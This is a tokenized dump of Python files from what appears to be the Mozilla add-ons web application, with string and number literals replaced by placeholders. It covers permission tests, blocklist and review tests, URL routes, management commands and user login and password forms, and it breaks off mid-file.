UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> group = Group . objects . create ( <EOL> name = '<STR_LIT>' , rules = '<STR_LIT>' ) <EOL> GroupUser . objects . create ( user = user , group = group ) <EOL> for method in self . safe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . 
user = user <EOL> assert self . permission . has_permission ( request , myview ) <EOL> assert self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> for method in self . unsafe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert not self . permission . has_permission ( request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_actual_reviewer ( self ) : <EOL> user = UserProfile . objects . get ( email = '<STR_LIT>' ) <EOL> for method in self . safe_methods + self . unsafe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert self . permission . has_permission ( request , myview ) <EOL> assert self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> class TestAllowUnlistedReviewer ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . permission = AllowReviewerUnlisted ( ) <EOL> self . request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> def test_user_cannot_be_anonymous ( self ) : <EOL> self . request . user = AnonymousUser ( ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert not self . permission . has_permission ( self . request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , obj ) <EOL> def test_authenticated_but_not_reviewer ( self ) : <EOL> self . request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert not self . permission . has_permission ( self . request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , obj ) <EOL> def test_admin ( self ) : <EOL> self . request . user = UserProfile . objects . 
get ( email = '<STR_LIT>' ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert self . permission . has_permission ( self . request , myview ) <EOL> assert self . permission . has_object_permission ( self . request , myview , obj ) <EOL> def test_unlisted_reviewer ( self ) : <EOL> self . request . user = UserProfile . objects . get ( <EOL> email = '<STR_LIT>' ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert self . permission . has_permission ( self . request , myview ) <EOL> assert self . permission . has_object_permission ( self . request , myview , obj ) <EOL> class TestAllowReadOnlyIfPublicAndListed ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . permission = AllowReadOnlyIfPublicAndListed ( ) <EOL> self . request_factory = RequestFactory ( ) <EOL> self . unsafe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . safe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def request ( self , verb ) : <EOL> request = getattr ( self . request_factory , verb ) ( '<STR_LIT:/>' ) <EOL> request . user = AnonymousUser ( ) <EOL> return request <EOL> def test_has_permission ( self ) : <EOL> for verb in self . safe_methods : <EOL> assert self . permission . has_permission ( self . request ( verb ) , myview ) <EOL> for verb in self . unsafe_methods : <EOL> assert not self . permission . has_permission ( <EOL> self . request ( verb ) , myview ) <EOL> def test_has_object_permission_public ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = True <EOL> obj . is_listed = True <EOL> for verb in self . safe_methods : <EOL> assert self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> for verb in self . unsafe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> def test_has_object_permission_not_public ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . 
return_value = False <EOL> obj . is_listed = True <EOL> for verb in self . unsafe_methods + self . safe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> def test_has_object_permission_not_listed ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = True <EOL> obj . is_listed = False <EOL> for verb in self . unsafe_methods + self . safe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> def test_has_object_permission_not_listed_nor_public ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = False <EOL> obj . is_listed = False <EOL> for verb in self . unsafe_methods + self . safe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) </s>
<s> from olympia . amo . tests import TestCase <EOL> from olympia . blocklist import forms <EOL> from olympia . blocklist . models import BlocklistItem , BlocklistPlugin <EOL> class BlocklistFormTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( BlocklistFormTest , self ) . setUp ( ) <EOL> self . blitem = BlocklistItem . objects . create ( ) <EOL> self . blplugin = BlocklistPlugin . objects . create ( ) <EOL> def test_app_form_only_blitem ( self ) : <EOL> data = { '<STR_LIT>' : self . blitem . pk , '<STR_LIT>' : None } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert form . is_valid ( ) <EOL> def test_app_form_only_blplugin ( self ) : <EOL> data = { '<STR_LIT>' : self . blplugin . pk , '<STR_LIT>' : None } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert form . is_valid ( ) <EOL> def test_app_form_neither_blplugin_and_blitem ( self ) : <EOL> data = { '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert not form . is_valid ( ) <EOL> assert '<STR_LIT>' in str ( form . errors ) <EOL> def test_app_form_both_blplugin_and_blitem ( self ) : <EOL> data = { '<STR_LIT>' : self . blitem . pk , '<STR_LIT>' : self . blplugin . pk } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert not form . is_valid ( ) <EOL> assert '<STR_LIT>' in str ( form . errors ) </s>
<s> import os <EOL> import sys <EOL> import logging <EOL> import warnings <EOL> import jingo <EOL> import jingo . monkey <EOL> import session_csrf <EOL> from django . apps import AppConfig <EOL> from django . core . management import call_command <EOL> from django . conf import settings <EOL> from django . utils import translation <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class CoreConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def ready ( self ) : <EOL> super ( CoreConfig , self ) . ready ( ) <EOL> if not settings . DEBUG : <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' ) <EOL> jingo . monkey . patch ( ) <EOL> jingo_env = jingo . get_env ( ) <EOL> jingo_env . install_gettext_translations ( translation , newstyle = True ) <EOL> session_csrf . monkeypatch ( ) <EOL> self . configure_logging ( ) <EOL> self . load_product_details ( ) <EOL> self . set_recursion_limit ( ) <EOL> def configure_logging ( self ) : <EOL> """<STR_LIT>""" <EOL> from olympia . lib . log_settings_base import log_configure <EOL> log_configure ( ) <EOL> def load_product_details ( self ) : <EOL> """<STR_LIT>""" <EOL> from product_details import product_details <EOL> if not product_details . last_update : <EOL> log . info ( '<STR_LIT>' ) <EOL> call_command ( '<STR_LIT>' ) <EOL> product_details . __init__ ( ) <EOL> def set_recursion_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in os . environ : <EOL> try : <EOL> limit = int ( os . environ [ '<STR_LIT>' ] ) <EOL> except TypeError : <EOL> log . warning ( '<STR_LIT>' . format ( <EOL> os . environ [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> sys . setrecursionlimit ( limit ) <EOL> log . info ( '<STR_LIT>' . format ( limit ) ) </s>
<s> from django . contrib import admin <EOL> from . models import DiscoveryModule <EOL> class DiscoveryModuleAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> admin . site . register ( DiscoveryModule , DiscoveryModuleAdmin ) </s>
<s> from django . conf . urls import url <EOL> from olympia . addons . urls import ADDON_ID <EOL> from olympia . editors import views , views_themes <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , views . home , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_nominated , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_pending , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_prelim , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_fast_track , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_moderated , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . application_versions_json , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue_nominated , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue_pending , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue_prelim , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_list , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . eventlog , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . eventlog_detail , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . reviewlog , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . beta_signed_log , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . queue_version_notes , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_viewing , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . review_viewing , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . review , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . performance , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . 
motd , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . save_motd , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . abuse_reports , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . leaderboard , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . whiteboard , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . home , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_list , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_list , <EOL> name = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : True } ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_list , <EOL> name = '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : True } ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_queue , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_queue_flagged , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_queue_rereview , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_commit , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_single , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , <EOL> views_themes . themes_history , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views_themes . themes_logs , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . release_locks , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . deleted_themes , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_search , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from optparse import make_option <EOL> from django . conf import settings <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from olympia . landfill . generators import generate_themes <EOL> class Command ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> help = __doc__ <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT:email>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) , <EOL> ) <EOL> def handle ( self , * args , ** kwargs ) : <EOL> if not settings . DEBUG : <EOL> raise CommandError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> num = int ( args [ <NUM_LIT:0> ] ) <EOL> email = kwargs . get ( '<STR_LIT:email>' ) <EOL> generate_themes ( num , email ) </s>
<s> import StringIO <EOL> import threading <EOL> import time <EOL> from django . core import management <EOL> from django . db import connection <EOL> from django . test . testcases import TransactionTestCase <EOL> from olympia . amo . search import get_es <EOL> from olympia . amo . tests import addon_factory , ESTestCase <EOL> from olympia . amo . urlresolvers import reverse <EOL> from olympia . amo . utils import urlparams <EOL> from olympia . lib . es . utils import is_reindexing_amo , unflag_reindexing_amo <EOL> ES = get_es ( ) <EOL> class TestIndexCommand ( ESTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestIndexCommand , self ) . setUp ( ) <EOL> if is_reindexing_amo ( ) : <EOL> unflag_reindexing_amo ( ) <EOL> self . url = reverse ( '<STR_LIT>' ) <EOL> self . indices = ES . indices . status ( ) [ '<STR_LIT>' ] . keys ( ) <EOL> def _fixture_setup ( self ) : <EOL> return TransactionTestCase . _fixture_setup ( self ) <EOL> def _fixture_teardown ( self ) : <EOL> return TransactionTestCase . _fixture_teardown ( self ) <EOL> def tearDown ( self ) : <EOL> current_indices = ES . indices . status ( ) [ '<STR_LIT>' ] . keys ( ) <EOL> for index in current_indices : <EOL> if index not in self . indices : <EOL> ES . indices . delete ( index , ignore = <NUM_LIT> ) <EOL> super ( TestIndexCommand , self ) . tearDown ( ) <EOL> def check_results ( self , expected ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( urlparams ( self . url , sort = '<STR_LIT>' ) ) <EOL> assert response . status_code == <NUM_LIT:200> <EOL> got = self . get_results ( response ) <EOL> for addon in expected : <EOL> assert addon . pk in got , '<STR_LIT>' % ( addon . pk , got ) <EOL> return response <EOL> def get_results ( self , response ) : <EOL> """<STR_LIT>""" <EOL> pager = response . context [ '<STR_LIT>' ] <EOL> results = [ ] <EOL> for page_num in range ( pager . paginator . num_pages ) : <EOL> results . extend ( [ item . pk for item <EOL> in pager . paginator . 
page ( page_num + <NUM_LIT:1> ) ] ) <EOL> return results <EOL> def get_indices_aliases ( self ) : <EOL> """<STR_LIT>""" <EOL> indices = ES . indices . get_aliases ( ) <EOL> items = [ ( index , aliases [ '<STR_LIT>' ] . keys ( ) [ <NUM_LIT:0> ] ) <EOL> for index , aliases in indices . items ( ) <EOL> if len ( aliases [ '<STR_LIT>' ] ) > <NUM_LIT:0> and index . startswith ( '<STR_LIT:test>' ) ] <EOL> items . sort ( ) <EOL> return items <EOL> def test_reindexation ( self ) : <EOL> addon = addon_factory ( ) <EOL> self . refresh ( ) <EOL> wanted = [ addon ] <EOL> self . check_results ( wanted ) <EOL> old_indices = self . get_indices_aliases ( ) <EOL> class ReindexThread ( threading . Thread ) : <EOL> def __init__ ( self ) : <EOL> self . stdout = StringIO . StringIO ( ) <EOL> super ( ReindexThread , self ) . __init__ ( ) <EOL> def run ( self ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> management . call_command ( '<STR_LIT>' , stdout = self . stdout ) <EOL> t = ReindexThread ( ) <EOL> t . start ( ) <EOL> while t . is_alive ( ) and not is_reindexing_amo ( ) : <EOL> connection . _commit ( ) <EOL> connection . clean_savepoints ( ) <EOL> old_addons_count = len ( wanted ) <EOL> while t . is_alive ( ) and len ( wanted ) < old_addons_count + <NUM_LIT:3> : <EOL> wanted . append ( addon_factory ( ) ) <EOL> connection . _commit ( ) <EOL> connection . clean_savepoints ( ) <EOL> self . refresh ( ) <EOL> self . check_results ( wanted ) <EOL> if len ( wanted ) == old_addons_count : <EOL> raise AssertionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> t . join ( ) <EOL> t . stdout . seek ( <NUM_LIT:0> ) <EOL> stdout = t . stdout . read ( ) <EOL> assert '<STR_LIT>' in stdout , stdout <EOL> connection . _commit ( ) <EOL> connection . clean_savepoints ( ) <EOL> self . refresh ( ) <EOL> self . check_results ( wanted ) <EOL> new_indices = self . 
get_indices_aliases ( ) <EOL> assert len ( old_indices ) == len ( new_indices ) <EOL> assert old_indices != new_indices , ( stdout , old_indices , new_indices ) </s>
<s> from amo . utils import chunked <EOL> from mkt . developers . tasks import generate_image_assets <EOL> from mkt . webapps . models import Webapp <EOL> def run ( ) : <EOL> for chunk in chunked ( Webapp . objects . all ( ) , <NUM_LIT:50> ) : <EOL> for app in chunk : <EOL> try : <EOL> generate_image_assets . delay ( app ) <EOL> except Exception : <EOL> pass </s>
<s> from mkt . collections . models import Collection <EOL> def run ( ) : <EOL> """<STR_LIT>""" <EOL> for c in Collection . objects . all ( ) : <EOL> c . save ( ) </s>
<s> from django . utils import translation <EOL> from olympia import amo <EOL> from olympia . amo . tests import TestCase , ESTestCase <EOL> from olympia . addons . models import Addon <EOL> from olympia . reviews import tasks <EOL> from olympia . reviews . models import ( <EOL> check_spam , GroupedRating , Review , ReviewFlag , Spam ) <EOL> from olympia . users . models import UserProfile <EOL> class TestReviewModel ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_translations ( self ) : <EOL> translation . activate ( '<STR_LIT>' ) <EOL> r1 = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> self . trans_eq ( r1 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> r2 = Review . objects . get ( id = <NUM_LIT:2> ) <EOL> self . trans_eq ( r2 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> translation . activate ( '<STR_LIT>' ) <EOL> r1 = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> self . trans_eq ( r1 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> r2 = Review . objects . get ( id = <NUM_LIT:2> ) <EOL> self . trans_eq ( r2 . title , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_soft_delete ( self ) : <EOL> assert Review . objects . count ( ) == <NUM_LIT:2> <EOL> assert Review . unfiltered . count ( ) == <NUM_LIT:2> <EOL> Review . objects . get ( id = <NUM_LIT:1> ) . delete ( ) <EOL> assert Review . objects . count ( ) == <NUM_LIT:1> <EOL> assert Review . unfiltered . count ( ) == <NUM_LIT:2> <EOL> Review . objects . filter ( id = <NUM_LIT:2> ) . delete ( ) <EOL> assert Review . objects . count ( ) == <NUM_LIT:0> <EOL> assert Review . unfiltered . count ( ) == <NUM_LIT:2> <EOL> def test_filter_for_many_to_many ( self ) : <EOL> review = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> addon = review . addon <EOL> assert review in addon . _reviews . all ( ) <EOL> review . update ( deleted = True ) <EOL> addon = Addon . objects . get ( pk = addon . pk ) <EOL> assert review not in addon . _reviews . 
all ( ) <EOL> def test_no_filter_for_relations ( self ) : <EOL> review = Review . objects . get ( id = <NUM_LIT:1> ) <EOL> flag = ReviewFlag . objects . create ( review = review , <EOL> flag = '<STR_LIT>' ) <EOL> assert flag . review == review <EOL> review . update ( deleted = True ) <EOL> flag = ReviewFlag . objects . get ( pk = flag . pk ) <EOL> assert flag . review == review <EOL> class TestGroupedRating ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> grouped_ratings = [ ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ] <EOL> def test_get_none ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT:3> , update_none = False ) is None <EOL> def test_set ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) is None <EOL> GroupedRating . set ( <NUM_LIT> ) <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) == ( <EOL> self . grouped_ratings ) <EOL> def test_cron ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) is None <EOL> tasks . addon_grouped_rating ( <NUM_LIT> ) <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) == ( <EOL> self . grouped_ratings ) <EOL> def test_update_none ( self ) : <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = False ) is None <EOL> assert GroupedRating . get ( <NUM_LIT> , update_none = True ) == ( <EOL> self . grouped_ratings ) <EOL> class TestSpamTest ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_create_not_there ( self ) : <EOL> Review . objects . all ( ) . delete ( ) <EOL> assert Review . objects . count ( ) == <NUM_LIT:0> <EOL> check_spam ( <NUM_LIT:1> ) <EOL> def test_add ( self ) : <EOL> assert Spam ( ) . add ( Review . objects . 
all ( ) [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> class TestRefreshTest ( ESTestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( TestRefreshTest , self ) . setUp ( ) <EOL> self . addon = Addon . objects . create ( type = amo . ADDON_EXTENSION ) <EOL> self . user = UserProfile . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT:0.0> <EOL> def get_bayesian_rating ( self ) : <EOL> q = Addon . search ( ) . filter ( id = self . addon . id ) <EOL> return list ( q . values_dict ( '<STR_LIT>' ) ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> def test_created ( self ) : <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT:0.0> <EOL> Review . objects . create ( addon = self . addon , user = self . user , rating = <NUM_LIT:4> ) <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT> <EOL> def test_edited ( self ) : <EOL> self . test_created ( ) <EOL> r = self . addon . reviews . all ( ) [ <NUM_LIT:0> ] <EOL> r . rating = <NUM_LIT:1> <EOL> r . save ( ) <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT> <EOL> def test_deleted ( self ) : <EOL> self . test_created ( ) <EOL> r = self . addon . reviews . all ( ) [ <NUM_LIT:0> ] <EOL> r . delete ( ) <EOL> self . refresh ( ) <EOL> assert self . get_bayesian_rating ( ) == <NUM_LIT:0.0> </s>
<s> from django import forms <EOL> class DateForm ( forms . Form ) : <EOL> start = forms . DateField ( input_formats = [ '<STR_LIT>' ] , required = False ) <EOL> end = forms . DateField ( input_formats = [ '<STR_LIT>' ] , required = False ) <EOL> last = forms . IntegerField ( required = False ) </s>
<s> from django . core . management . base import BaseCommand <EOL> from olympia . tags . models import Tag <EOL> from olympia . tags . tasks import clean_tag <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** kw ) : <EOL> pks = list ( Tag . objects . values_list ( '<STR_LIT>' , flat = True ) . order_by ( '<STR_LIT>' ) ) <EOL> print "<STR_LIT>" % len ( pks ) <EOL> for pk in pks : <EOL> clean_tag . delay ( pk ) </s>
<s> import os <EOL> import re <EOL> from smtplib import SMTPException <EOL> from django import forms <EOL> from django . conf import settings <EOL> from django . core . files . storage import default_storage as storage <EOL> from django . contrib . auth import forms as auth_forms <EOL> from django . contrib . auth . tokens import default_token_generator <EOL> from django . forms . util import ErrorList <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils . translation import ugettext as _ , ugettext_lazy as _lazy <EOL> import commonware . log <EOL> import happyforms <EOL> from olympia import amo <EOL> from olympia . accounts . views import fxa_error_message <EOL> from olympia . amo . fields import ReCaptchaField , HttpHttpsOnlyURLField <EOL> from olympia . users import notifications as email <EOL> from olympia . amo . urlresolvers import reverse <EOL> from olympia . amo . utils import clean_nl , has_links , log_cef , slug_validator <EOL> from olympia . translations import LOCALES <EOL> from . import tasks <EOL> from . models import ( <EOL> UserProfile , UserNotification , BlacklistedName , BlacklistedEmailDomain , <EOL> BlacklistedPassword ) <EOL> from . widgets import ( <EOL> NotificationsSelectMultiple , RequiredCheckboxInput , RequiredEmailInput , <EOL> RequiredInputMixin , RequiredTextarea ) <EOL> log = commonware . log . getLogger ( '<STR_LIT>' ) <EOL> admin_re = re . compile ( '<STR_LIT>' ) <EOL> class PasswordMixin : <EOL> min_length = <NUM_LIT:8> <EOL> error_msg = { <EOL> '<STR_LIT>' : _lazy ( '<STR_LIT>' ) % min_length } <EOL> @ classmethod <EOL> def widget ( cls , ** kw ) : <EOL> attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cls . min_length , <EOL> } <EOL> if kw . pop ( '<STR_LIT>' , False ) : <EOL> attrs . update ( RequiredInputMixin . required_attrs ) <EOL> return forms . 
PasswordInput ( attrs = attrs , ** kw ) <EOL> def clean_password ( self , field = '<STR_LIT:password>' , instance = '<STR_LIT>' ) : <EOL> data = self . cleaned_data [ field ] <EOL> if not data : <EOL> return data <EOL> user = getattr ( self , instance , None ) <EOL> if user and user . pk and user . needs_tougher_password : <EOL> if not admin_re . search ( data ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> if BlacklistedPassword . blocked ( data ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return data <EOL> class AuthenticationForm ( auth_forms . AuthenticationForm ) : <EOL> username = forms . CharField ( max_length = <NUM_LIT> , widget = RequiredEmailInput ) <EOL> password = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( render_value = False , <EOL> required = True ) ) <EOL> rememberme = forms . BooleanField ( required = False ) <EOL> recaptcha = ReCaptchaField ( ) <EOL> recaptcha_shown = forms . BooleanField ( widget = forms . HiddenInput , <EOL> required = False ) <EOL> def __init__ ( self , request = None , use_recaptcha = False , * args , ** kw ) : <EOL> super ( AuthenticationForm , self ) . __init__ ( * args , ** kw ) <EOL> if not use_recaptcha or not settings . NOBOT_RECAPTCHA_PRIVATE_KEY : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> def clean ( self ) : <EOL> if ( '<STR_LIT:password>' in self . errors and '<STR_LIT:password>' in self . data and <EOL> <NUM_LIT:1> < len ( self . data [ '<STR_LIT:password>' ] ) < PasswordMixin . min_length ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( PasswordMixin . min_length , <EOL> reverse ( '<STR_LIT>' ) ) <EOL> self . _errors [ '<STR_LIT:password>' ] = ErrorList ( [ mark_safe ( msg ) ] ) <EOL> if '<STR_LIT>' in self . errors : <EOL> return { } <EOL> return super ( AuthenticationForm , self ) . 
clean ( ) <EOL> class PasswordResetForm ( auth_forms . PasswordResetForm ) : <EOL> email = forms . EmailField ( widget = RequiredEmailInput ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( PasswordResetForm , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean_email ( self ) : <EOL> email = self . cleaned_data [ '<STR_LIT:email>' ] <EOL> self . users_cache = UserProfile . objects . filter ( email__iexact = email ) <EOL> try : <EOL> if self . users_cache . get ( ) . fxa_migrated ( ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> except UserProfile . DoesNotExist : <EOL> pass <EOL> return email <EOL> def save ( self , ** kw ) : <EOL> if not self . users_cache : <EOL> log . info ( "<STR_LIT>" . format ( <EOL> ** self . cleaned_data ) ) <EOL> return <EOL> for user in self . users_cache : <EOL> log . info ( u'<STR_LIT>' % user ) <EOL> if user . needs_tougher_password : <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = user , <EOL> signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' ) <EOL> else : <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = user , <EOL> signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' ) <EOL> try : <EOL> self . base_save ( ** kw ) <EOL> except SMTPException , e : <EOL> log . error ( "<STR_LIT>" % ( user , e ) ) <EOL> def base_save ( <EOL> self , domain_override = None , <EOL> subject_template_name = '<STR_LIT>' , <EOL> email_template_name = '<STR_LIT>' , <EOL> use_https = False , token_generator = default_token_generator , <EOL> from_email = None , request = None , html_email_template_name = None ) : <EOL> """<STR_LIT>""" <EOL> from django . core . mail import send_mail <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . sites . models import get_current_site <EOL> from django . template import loader <EOL> from django . utils . 
